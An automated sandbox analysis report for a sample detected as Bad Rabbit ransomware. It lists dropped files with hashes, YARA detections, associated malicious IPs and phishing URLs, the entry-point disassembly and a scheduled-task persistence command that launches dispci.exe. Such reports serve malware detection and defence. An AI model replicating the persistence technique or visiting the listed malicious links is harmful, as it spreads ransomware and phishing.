              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, cdn.onenote.net.edgekey.net, e86303.dscx.akamaiedge.net, clients2.google.com, www.bing.com.edgekey.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, e15275.d.akamaiedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, r.bing.com.edgekey.net, wu.ec.azureedge.net, a-0003.a-msedge.net, tile-service.weather.microsoft.com, www.tm.v4.a.pr
• Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: LisectAVT_2403002C_35.exe
Time | Type | Description
02:18:52 | API Interceptor | 32x Sleep call for process: rundll32.exe modified
02:18:55 | API Interceptor | 3x Sleep call for process: svchost.exe modified
08:18:54 | Task Scheduler | Run new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit
Match | Associated Sample Name / URL | Detection | Threat Name
104.98.116.138 | 942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe | malicious | Bdaejec
- | a.exe | malicious | Unknown
- | a4#Uff09.exe | malicious | Bdaejec, Sality
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | LisectAVT_2403002C_81.exe | malicious | Vidar | 23.197.127.21
- | 942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe | malicious | Bdaejec | 104.98.116.138
- | 7Y18r(251).exe | malicious | Bdaejec | 172.234.222.143
- | https://forms.office.com/r/kiNP3VZaGz | malicious | Unknown | 80.67.82.187
- | 7Y18r(155).exe | malicious | Unknown | 172.234.222.138
- | Fd_HR24 Jul, 2024.pdf | malicious | Phisher | 2.16.100.168
                    https://url5041.app.lucid.co/uni/ls/click?upn=u001.9CEiYqsCeDB7JcEaXQIz-2F9XjjPqk-2Fb4pFcLw69B6WqTy-2BbVFLiir3sSJZjbRo6mBAwRtKNr9Kf4WztrdCBts7iyzvcJ-2FIUH0XDrcbuiiKrlzy8ZwzSxYR1urVGEa2H8lG0Sg7ExDExUtTEJeACnxEcvsJ4CnFcY2OyyabtZjsqjBmQJR0iCaQNYCn9tJqfPt0sqRsrpUZbmtTsF5u4sk76aC5ja3Exi0TVSSBuxtzkkrePRrkTP-2FRoxSefUr1y9ilFhR_7YHA5TjKTAFn3LEZM-2F5lkHKyiA7Z3uxS7g7w0lpFY3VgLh-2FDGXI29ABs2GTmbGZIZHIxymEIAIiyGRh1AnBalmp58yag9E-2FrtA2h0nETB9HIcrFd1W-2BMglDx2EcdWaE0YUaZKghF9gUd9evpWd9o10VlCUS2n6DDMef1lVzEPNeAVIceaFC5X-2FwVIdJYlE5ubbjTe48aOxl7EYAkQAbI29zMPLBfzmo3-2F0oDrCz1NV8Z-2BgLjNSkhEL0v7ztjcjSQNYmg2ZtX7GcpdQCCaWNVfhkazGgvvJB3QcWd-2Fo6uMwkENEvM1i8Q5dxjk3O7SagsKeqlZGHyVQYiVQV70Bj-2BqwPqn7sRJMYA1CWG3MbbSEiFggnHBU9leFka7-2BLjrmTxclzDNBbGoPiatzLWpKmVvw-2Bx5nC-2FbsV4WwngsYxWK1QG1aOsoJu-2FNsl5G06ywgOfHOifxw2PEX15DLqK9LKLpY23-2B0gBFiHHbP5xi3TlZqqdPIKY76qvnZKXKkRHP7lkjW54-2BjkWiD-2BFCJF-2BYwCLISwPacjQQKLVdWymA0jKWf0m780jvwQKochVtFIfu-2BJ9NnI-2BB2EwWIxQXcbAMYwMXcMBTQTHy61gyJ3FTzWhBE5wfCKo-2F8oXN5UhSp4kSbC0WEoFb3T831Z02n3p5vAL-2Ftzsl33DNu9nwqX-2FymwJG6bbNN49b2LwjYn6qVJYWS5SHBoNvXFMznGKBB-2Fn-2B5ec0wzJuS2t1Z7ZojX-2BZTbH-2F00rb4HPN-2BmX2VUh9CatGg9L1JM7vsjjRJrthuxEvN6-2BOqDHpRQ-2FjJ2ng1sbFzjs5LWXRhQ7AwghmMB4i-2FOI7rRtGet hashmaliciousUnknownBrowse
                    • 2.22.61.163
- | https://forms.office.com/Pages/ResponsePage.aspx?id=q9W6SpYqak-gDukUxOfbFKrxeFwi_dtNtj4fQh9gMzZUMTZPR0tNMVg5QkozVFpKQlZSVDA0SExBWi4u | malicious | HTMLPhisher | 173.222.108.211
- | 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe | malicious | Bdaejec, Socelars | 172.232.25.148
- | 4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe | malicious | Bdaejec, Socelars | 172.232.4.213
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Windows\cscc.dat | 09490699.exe | malicious | Unknown
- | 09490699.exe | malicious | Unknown
- | 07bb0738.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
- | 4d44bed6.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
- | 63416c4d.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
- | irH9zMhZub.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
- | 1jDe7zWnoe.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, Petya, RedLine
- | bpkAAJptGv.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
- | 4W5dQXszUV.exe | malicious | Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
- | infp.dll | malicious | Mimikatz
                                        Process:C:\Windows\dispci.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):54
                                        Entropy (8bit):1.937652566318511
                                        Encrypted:false
                                        SSDEEP:3:/lzlsgJI12l:QgGgl
                                        MD5:C8AA5F9A1CAE94281B68BCBE2045B512
                                        SHA1:9B566DB304B2CA9163C3774FCD96C33CD99EF7BA
                                        SHA-256:E7D1B33769635599FC362D398FBA21A7CD7B456CE074AFB1632D54F7686E3F4A
                                        SHA-512:6FF68D7252003229FBF64E799E4ED32315CA1F2C5386A2FB6B182E37AB63C55FC06215F95CCDCE9B3812E7C612EEE45659F8BEB7A7A9ADFD61EFA83E39400C42
                                        Malicious:false
                                        Preview:........................................user-PC$.
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8192
                                        Entropy (8bit):0.35901589905449205
                                        Encrypted:false
                                        SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                        MD5:7D48941DB05D2D1C9A0C52739933543F
                                        SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                                        SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                                        SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                                        Malicious:false
                                        Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.7106941242474595
                                        Encrypted:false
                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq4:2JIB/wUKUKQncEmYRTwh0c
                                        MD5:8D5C5D37FA2437A940F999F4844C9EF1
                                        SHA1:E1499807E571DDB62107C9392BF72507CCCC67B1
                                        SHA-256:607977E9AE62E0214D28B03F55490896D361D6C69BE24B8532150ECDD2B1CDE4
                                        SHA-512:D0DC08C67B7B4007B4946DC579EC2747845730E3698C45C1D341C2E0778B56791D9AD71D0D813D3A21A65879CEAA0D5919C509AAC6830E1670B49E915D204A3E
                                        Malicious:false
                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x26cf657f, page size 16384, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.6650649744706726
                                        Encrypted:false
                                        SSDEEP:1536:dSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:dazaU+uroc2U5Si6
                                        MD5:F725A5881A0B44F95C6EE160D1588C57
                                        SHA1:7EFB30A18BEC7FF6F542A5EA3E8D76B73516CB26
                                        SHA-256:770B447CEDF198452E4DE628F6935189D8E2174805009368324411F377361B74
                                        SHA-512:B3EDF7F6E84DFD0D386BABE133D95727CAD9EA37294409250F6AB1C5581B69331126C304E94FC73EE98F819EEF8726AC87BAA3B91B88E0B49E342A54F3295B9A
                                        Malicious:false
                                        Preview:&.e.... .......#.......X\...;...{......................0.e..........|..8....|Y.h.b..........|..0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................T......|..........................|...........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07928127155298045
                                        Encrypted:false
                                        SSDEEP:3:ZYtlOetYeqs/64LUK/7me/YllkqqG9lXlZOS:CXrzRC+DmeQVr
                                        MD5:FB708D46A4D0A703ECC49C8751EB7CF7
                                        SHA1:A0BE382E27A3852519F0D9F1A5A057C1B2B9B264
                                        SHA-256:9BF2FFE3874464A5898E11495A1ED2924FC0E2B5CE563578E266D2BE9008F969
                                        SHA-512:2DDB72C5EE18C91EB91E6138E25DEC1E6F5310341158FEA548CF8FEA18D34327A1409F3F462D9A62AD373A78D21B4BC4179CB568CDBCD10F0C54AD4215272013
                                        Malicious:false
                                        Preview:.hlL.....................................;...{..8....|Y......|...............|E......|...w/q.....|e.........................|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):697182
                                        Entropy (8bit):5.235446634875911
                                        Encrypted:false
                                        SSDEEP:12288:DBXiKZWAAllNJheaP7Qata8GtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp/10:q+
                                        MD5:FFEAA4841F005787CA2DA11BE1D08C72
                                        SHA1:5B2E34B55494CD6C43E346C8D5FE61D59D43D0B3
                                        SHA-256:2A2ABA9D1E19C03B2C29B1C5383E719AADD4A326ABE4E9FB28B0816BEABE5997
                                        SHA-512:0A37DB03C9E04594177C8AEEB886CEE8C498B9B2676C677584D7137D0AAAEA5B333FD28263C1CA6F345785A5590F2BC9F844A0DFCDF128EBFA53BAD62158757A
                                        Malicious:false
                                        Preview:.....c(i.rI.(....,.3.;...a.&Tw.O..].$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):697182
                                        Entropy (8bit):5.235446634875911
                                        Encrypted:false
                                        SSDEEP:12288:DBXiKZWAAllNJheaP7Qata8GtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp/10:q+
                                        MD5:FFEAA4841F005787CA2DA11BE1D08C72
                                        SHA1:5B2E34B55494CD6C43E346C8D5FE61D59D43D0B3
                                        SHA-256:2A2ABA9D1E19C03B2C29B1C5383E719AADD4A326ABE4E9FB28B0816BEABE5997
                                        SHA-512:0A37DB03C9E04594177C8AEEB886CEE8C498B9B2676C677584D7137D0AAAEA5B333FD28263C1CA6F345785A5590F2BC9F844A0DFCDF128EBFA53BAD62158757A
                                        Malicious:false
                                        Preview:.....c(i.rI.(....,.3.;...a.&Tw.O..].$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):999
                                        Entropy (8bit):4.966299883488245
                                        Encrypted:false
                                        SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                        MD5:24567B9212F806F6E3E27CDEB07728C0
                                        SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                        SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                        SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                        Malicious:false
                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                        Process:C:\Windows\dispci.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Jul 25 05:18:49 2024, mtime=Thu Jul 25 05:18:54 2024, atime=Thu Jul 25 05:18:49 2024, length=142848, window=hide
                                        Category:dropped
                                        Size (bytes):725
                                        Entropy (8bit):4.739813645567508
                                        Encrypted:false
                                        SSDEEP:12:8iykIKQm/fLDMwXXR7o0VcfKjT/vNjAcMR6W+IWgL6CNbKblpJZpJaILYumV:81b+nHRo0uijTnpALl+IWt2bUlpJZpJs
                                        MD5:C6EE233E84413B9FAB7BD9220A5789B9
                                        SHA1:C76A37D5D67ECE64F3E55581EBAF8549F6AF8DBF
                                        SHA-256:34EACD82ECA6AE32B7453ABD05CBF86EBCB60A6336C7FBF607B6FF487EEB1EF1
                                        SHA-512:984CF26A48DC0FDA684E0E0B961E4166C6D45207E66EEDC9B41EBB84BF76BAAAF5316194C8A44B55787E32AEDDFC9C79EB44302DF584ECA3925D0AF5FCEF9A88
                                        Malicious:false
                                        Preview:L..................F.... .....i.Z.......Z.....i.Z................................P.O. .:i.....+00.../C:\...................V.1......X[2..Windows.@......OwH.X[2....3.....................I...W.i.n.d.o.w.s.....`.2......XY2 .dispci.exe..F.......XY2.XY2..........................M.[.d.i.s.p.c.i...e.x.e.......D...............-.......C..................C:\Windows\dispci.exe....D.E.C.R.Y.P.T.......\.....\.....\.W.i.n.d.o.w.s.\.d.i.s.p.c.i...e.x.e.........$..................C..B..g..(.#....`.......X.......134349...........hT..CrF.f4... .u../Tc...,......hT..CrF.f4... .u../Tc...,..............A...1SPS.XF.L8C....&.m.%................S.-.1.-.5.-.1.8.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):62328
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:C7CA77D847F1802502EF3B9228D388E4
                                        SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                        SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                        SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                        Malicious:true
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.306461250274409
                                        Encrypted:false
                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                        Malicious:false
                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):210632
                                        Entropy (8bit):6.677691827536191
                                        Encrypted:false
                                        SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                        MD5:EDB72F4A46C39452D1A5414F7D26454A
                                        SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                        SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                        SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: 09490699.exe, Detection: malicious
                                        • Filename: 09490699.exe, Detection: malicious
                                        • Filename: 07bb0738.exe, Detection: malicious
                                        • Filename: 4d44bed6.exe, Detection: malicious
                                        • Filename: 63416c4d.exe, Detection: malicious
                                        • Filename: irH9zMhZub.exe, Detection: malicious
                                        • Filename: 1jDe7zWnoe.exe, Detection: malicious
                                        • Filename: bpkAAJptGv.exe, Detection: malicious
                                        • Filename: 4W5dQXszUV.exe, Detection: malicious
                                        • Filename: infp.dll, Detection: malicious
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):142848
                                        Entropy (8bit):6.314365095327337
                                        Encrypted:false
                                        SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                        MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                        SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                        SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                        SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                        • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 96%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\LisectAVT_2403002C_35.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):410760
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:C4F26ED277B51EF45FA180BE597D96E8
                                        SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                        SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                        SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                        Malicious:true
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                        Entropy (8bit):7.891833922139808
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:LisectAVT_2403002C_35.exe
                                        File size:441'910 bytes
                                        MD5:d7ad0cdda235608cb4afb702562fdcfd
                                        SHA1:358699a2bc63d26030f88b6287b07aaeb69680c5
                                        SHA256:06d269411d74cbc6026eab2776a7cded68dd3380b7e1b890f15d2210d2ff376f
                                        SHA512:4e269eb4a0d11f54d2e3ce167471b3a52cb4cb33f0766c420c0553db48c95f41c2a73fe1257669a63893a2a3e9cb0c1920a516d1ba780faea3f46e97260d2636
                                        SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR6:vT56NbqWRwZaEr3yt2O3XR6
                                        TLSH:0C9412426729EE92D1E1B8F84093E7CC4BB97B090FB991EF9D993485CC79B8319380D5
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2..G2..G2..?...G2..?...G2......G2......G2..?...G2..G3..G2......G2......G2.Rich.G2.........................PE..L......Y...
                                        Icon Hash:2144b26d6c76b24d
                                        Entrypoint:0x4012c0
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x59EC0396 [Sun Oct 22 02:33:58 2017 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:e3bda9df66f1f9b2b9b7b068518f2af1
                                        Signature Valid:
                                        Signature Issuer:
                                        Signature Validation Error:
                                        Error Number:
                                        Not Before, Not After
                                          Subject Chain
                                            Version:
                                            Thumbprint MD5:
                                            Thumbprint SHA-1:
                                            Thumbprint SHA-256:
                                            Serial:
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            mov eax, 000012ACh
                                            call 00007F24BC820348h
                                            mov eax, dword ptr [00408000h]
                                            xor eax, ebp
                                            mov dword ptr [ebp-04h], eax
                                            push esi
                                            mov esi, dword ptr [00404004h]
                                            push edi
                                            call esi
                                            mov edi, eax
                                            test edi, edi
                                            je 00007F24BC820152h
                                            lea eax, dword ptr [ebp-00001250h]
                                            push eax
                                            mov dword ptr [ebp-00001250h], 00000000h
                                            call esi
                                            push eax
                                            call dword ptr [00404050h]
                                            mov esi, eax
                                            test esi, esi
                                            je 00007F24BC82012Eh
                                            cmp dword ptr [ebp-00001250h], 01h
                                            jne 00007F24BC81FFD3h
                                            xor eax, eax
                                            lea ebx, dword ptr [ebx+00000000h]
                                            movzx ecx, word ptr [eax+00406CF0h]
                                            mov word ptr [ebp+eax-0000124Ch], cx
                                            add eax, 02h
                                            test cx, cx
                                            jne 00007F24BC81FF9Bh
                                            jmp 00007F24BC820008h
                                            mov eax, dword ptr [esi]
                                            push eax
                                            push edi
                                            call dword ptr [00404060h]
                                            mov ecx, dword ptr [esi]
                                            add esp, 08h
                                            lea esi, dword ptr [ecx+02h]
                                            jmp 00007F24BC81FFB5h
                                            lea ecx, dword ptr [ecx+00h]
                                            mov dx, word ptr [ecx]
                                            add ecx, 02h
                                            test dx, dx
                                            jne 00007F24BC81FFA7h
                                            sub ecx, esi
                                            sar ecx, 1
                                            cmp word ptr [eax+ecx*2], 0022h
                                            lea eax, dword ptr [eax+ecx*2]
                                            jne 00007F24BC81FFB5h
                                            add eax, 02h
                                            cmp word ptr [eax], 0020h
                                            jne 00007F24BC81FFB5h
                                            add eax, 02h
                                            lea edx, dword ptr [ebp-0000124Ch]
                                            sub edx, eax
                                            lea ecx, dword ptr [ecx+00h]
                                            movzx ecx, word ptr [eax]
                                            mov word ptr [edx+eax], cx
                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [ASM] VS2008 SP1 build 30729
                                            • [ C ] VS2013 UPD5 build 40629
